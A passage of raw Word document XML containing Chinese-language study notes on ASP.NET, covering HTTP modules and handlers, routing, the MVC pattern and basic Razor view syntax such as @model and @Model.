          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以下一些就是典型的HTTPModule基础功能：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OutputCacheModule：实现了输出缓存功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SessionStateModule：在无状态的HTTP协议上实现了基于会话（Session）的状态保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WindowsAuthentication + FormsAuthentication + PassportAuthentication Module：实现了Windows，Forms和Passport这三种典型的身份认证方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HttpHandler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对于不同资源的请求，ASP.NET会加载不同的Handler来处理，比如aspx页面（实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="新宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>IHttpHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）和asmx Web服务（WebServiceHandler）对应的Handler是不同的。所有的HttpHandler都实现了具有如下定义的接口System.Web.IHttpHandler，定义了其中的方法ProcessRequest提供了处理请求的实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Routing路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，目标文件的路径决定了访问请求的URL。但是对于ASP.NET MVC应用来说，来自浏览器的请求总是来自某个Controller中的某个Action，请求URL与目标Controller/Action之间的映射是通过“路由”来实现的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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理解MVC模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MVC模式意味着一个MVC应用至少将被分离成3个层次：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Model)：含有或表现用户进行操作的数据。模型可以是简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(View Model)，它们只用来传递控制器和视图之间的数据；也可以是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>域模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Domain Model)，它包含业务领域的数据，以及处理这些数据的操作，转换和规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(View)：用于将模型的某些部分渲染成用户界面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>控制器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Controller)：处理传入的请求，执行模型上的操作，并选择渲染给用户的视图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>域模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>往往是一组C#类型(类或结构等)，统称为域类型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>域中的操作由域类型中定义的方法来实现，而域规则表示成这些方法的逻辑。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>域模型通常是持久化的，且一直处于活动状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>域模型是应用程序中业务数据及其处理的唯一和权威定义，我们常常把与模型放在一个单独的程序集中，这样应用程序的其他部分也可以创建对与模型的引用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在MVC中，控制器是C#类，通常派生于System.Web.Mvc.Controller类。从这个Controller派生而来的类中，每一个public方法都统称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动作方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Action Method)。这个方法通过ASP.NET的路由系统与一个可配置的URL相关联。当一个请求被发送给与一个动作方法相关联的URL时，便会执行控制器类中的语句，以进行域模型上的一些操作，然后选择一个视图显示给客户端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6026150" cy="1491615"/>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noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6038691" cy="1494905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP.NET MVC框架使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，该引擎负责处理视图的组件，以便为浏览器生成响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVC早期使用的是ASP.NET视图引擎，它用改进的WebForm标记来处理ASPX页面，MVC 3引入了Razor视图引擎。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Razor引擎</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图引擎(View Engine)负责处理ASP.NET的内容，并查找有关指令，这些指令典型的是将动态内容插入到发送给浏览器的输出，而Razor是MVC框架视图引擎的名称。以下是各个Razor语法的起到的作用。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="16"/>
        <w:tblW w:w="106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341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>问题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>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定义并访问模型对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:highlight w:val="yellow"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>@model</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>及</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:highlight w:val="yellow"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>@Model</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>表达式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减少视图中的重复</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用布局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使用默认布局</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用启动视图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通过控制器将数据传给视图</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>传递视图模型对象或视图包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根据数值不同输出不同结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用Razor条件语句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枚举数组或集合</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用@foreach表达式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在视图中添加命名控件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>使用@using表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>使用模型对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>在视图的第一行声明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 命名空间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>这样我们就能在后面通过@Model调用对象的属性，字段，方法了例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>.Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>//调用Name字段</w:t>
      </w:r>
    </w:p>
    <w:p>
